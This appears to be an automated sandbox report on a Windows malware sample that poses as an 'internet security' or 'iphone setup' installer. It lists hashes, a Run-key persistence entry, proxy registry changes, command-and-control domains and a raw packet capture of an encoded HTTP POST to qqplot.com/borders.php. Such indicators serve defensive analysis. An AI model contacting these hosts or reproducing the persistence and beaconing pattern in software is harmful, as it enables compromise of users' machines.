Analysis Date2014-09-07 21:02:57
MD58c478a63095b0c288108e60ac093c64d
SHA19c32cd826eadaed22bd50d8756009b775259a0e4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c14783ebc9b73607d9bcd2733d69b56a sha1: 7f99eabdf97edbbb2885e72b79ce6a6d40d1b12e size: 14848
Section.rdata md5: e720d75af01bba6e36af497fedd94624 sha1: 63c914de8af7206e73da81d8a090edc39c47b35f size: 512
Section.data md5: 34423a9c76082f36f5436dac9bc41a5f sha1: be5199c9b5dbfac2381547b593e8514e1b363c37 size: 110592
Section.rsrc md5: 5eee1fdda576a48287bc7c2d94353fc6 sha1: c806e8edf43cd16d182bc3bff5b6dc8bb6ef3526 size: 5120
Timestamp2009-07-17 02:11:33
VersionLegalCopyright: Copyright © 2009 m setup technologies
InternalName: iphone setup win32 3
FileVersion: 4.4.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: internet security
ProductVersion: 4.4.0.0
FileDescription: p Setup Self-Extractor a7
OriginalFilename: iphone setup win32 3
PEhash370231ecff65bf1f88d55d10201386e2738537a6
IMPhash9557b76fd592606f0344de02cdf8221e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com

Network Details:

DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.140.65
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSqqplot.com
Type: A
109.74.195.149
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
DNSbonreligion.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432b   YTr3iBkG/g+7VCC+
0x00000140 (00320)   7639306d 784f4870 37655263 48506959   v90mxOHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==


Strings
.
..."
.
t
..
.
.
.
.(
./
040904E4
 2009 m setup technologies 
4.4.0.0
BBABORT
Cannot open file "%s". %s
CFru
Comments
CompanyName
Copyright 
cwMK
DVCLAL
Error reading %s%s%s: %s
EzRL
Failed to get data for '%s'
FileDescription
FileVersion
GMnpw
InternalName
 internet security 
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
 iphone setup win32 3
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
lrn7
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
p Setup Self-Extractor a7
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
UTfC
VarFileInfo
VQO6
VS_VERSION_INFO
0$Fb"/fNv
0HlV%h
0(j/uX
0[n?Nqv
0uq4Z@
[194HX/QCC`
1^}BuJ
1dot3u
1o|_x,
1r$@NW
!}1RwU
2EUuWmvOtOc@16
+)(2PO
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3_c(?{#
3=)R6B 
3uM8nla
48yBjF3
4B<$D$
($4B<L
4D:H'8
:,@:4@:<@:D@%L
|4pPrFJ
4z&Yf;
>5h>"H
5k^2J4
,686R<
6V(sio_n
@/ \^7
7 [A@N
7FJAprh &y[0}v
7h!ClN
7i=-.p
^7kQ4q
.7N{Imp!$L
-8?9cK
$$8BL`
8+;),H
8$LB`p
9-]7BF(i
:!@:-@:9@$Dc
9/KfBEB
_9^(u!
a7Cb$@c
AbTknBhzX@
 ag2C]?
A.kSz<
A{^oYO
AQPZSR
 $(B08
b5mu14
'{B6":b
B7(R1PtT
B8]h%p
b:](9q
Bd8Mx15bi
bf,v^o
=B.LS D
>bltt.
#,Bqkng
!`>c~(0
cA0xXbBU
CallNextHookEx
CharLowerA
CharLowerBuffA
CidJH?$
>cP*.`
crypt32
cs4F	"
Cx7a$[`@Nq
CX[YZD
'D9W(J
@.data
D,'bBAt
|$dBP:
D@c"tOg
DDm{GF
=dHT?/
 D`np.
_dszEJKw0qE3
d+UKu<:!:
+D%;yy
@E\6nEq
e9+eBm'g5
EK_LbCb
!.,ELp
eP/0&Q
?EpH4k
ExitProcess
f%`avD
Fd^uN{
fiaHnL	gI
f%`Kaf
)fr5(>
f'R^LP
F,^s<il
f]*vD%
G8Z]/8>
GdVY5H
GetMenu
GetStringTypeW
GetThreadLocale
GetTickC
GetTickCount
GetUserDefaultLCID
GetVersion
G{lf"&S
"GNChp
gwEJV<
h1nXAe
H:8+w.u
\$hBt|
HE	'`q
/)/"hgH
HOHx_&6
HPN#,?
Hvc`*6
H\Xh+y%
hX-j^O
 =' I6z
 IFo;[}-
ik"""h
i%L+05
 iphone setup win32 3
IQSTRX
|iS6.9
IsCharUpperA
IwR?tn
j9$ /P
Jb0lPr
_#ji=b
@JI.b!a
jW7jQ	
KERNEL32.dll
=k*=f-s8
k%'S:'
k#X!Zt
@:!L*>
LDQwxG
%'LDvd
LJSS.F
LoadLibraryA
l!W3OR\
*m4A+I
m,=5k]Y+D
M'5T"DL
>@M$}6n0*
mB,a~I
MbWlwr
Mc1K6]
=ml'xp
M{Or*9
Mr3f;0tq
mSDnQ`
MtxIXF
;MZu{i
,n1o%|
@N6'L[
nbxICjI
)NN!XD
@Nq,	8
-[@@Nqv
nVa85+
+OiY2J
-!oOqNi
$ O*P,
oQIs)P)\
ounq&~I
O{w<wW+
<$PBd|
P'D8LxE][Z
;pDtg-
phR'@lOXHl/D
	pNo#Rul
Ppvx g
PQReA@=
P$XB`d
Qc(#[2
`+q:F:7
'QOU:N
qozy^c
\Q_tVJ
QV'Or~VH
r0*F}zF
`.rdata
`.rd?atd
RDLtP~
R\Tz/#R
)ru_?b
RwCnWfz0d@12
>s"7:F
S#E;T"
sGNA'LOBAc
`S%:_h
\s({[H7.
[Sl_fWo
s<l`wCsf
SW;oDAC3
sxPO[WU#q
SYb6':#
s	Z'Ab
!t~{2D'w
tc	!:D
T*g@(Rj
This program must be run under Win32
tL:Rtla
tLT5&_
trGdHt
TrJ2)/q
tsG8_d8
tTHXN(k<
TV"Bxo4?"
TYyYHb
u(6S$v 
u	/Aa+F
(uJ8??
user32.dll
%/VB0l
VbR6mL
- V_C'
=V/hbZ
VirtualAlloc
+VPqR%
+{>\VS
V?TW)w
w6i?`V
wHfQTS7yH527g
W[KQ3u
WRSPm'
~ W&}T
>[	W{>/(=Y
x@9YdB
(X~?'D
\	{Xe-
;+X l(]41U7G
]Xlda,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
x@Nu7(
=XNV_p
/x_RA=
X"W,TJ<CT
XyD\'d
xzIl5M!r
Y^bHVR/P
@yDD'L
ygD~Lx/
Y|[SnX@
YtB'me
#yT"o2
z[*5dD
z6zcVn
ZFtyu+
ZXO328
#z,XWTJ9Mw
zzIRwXX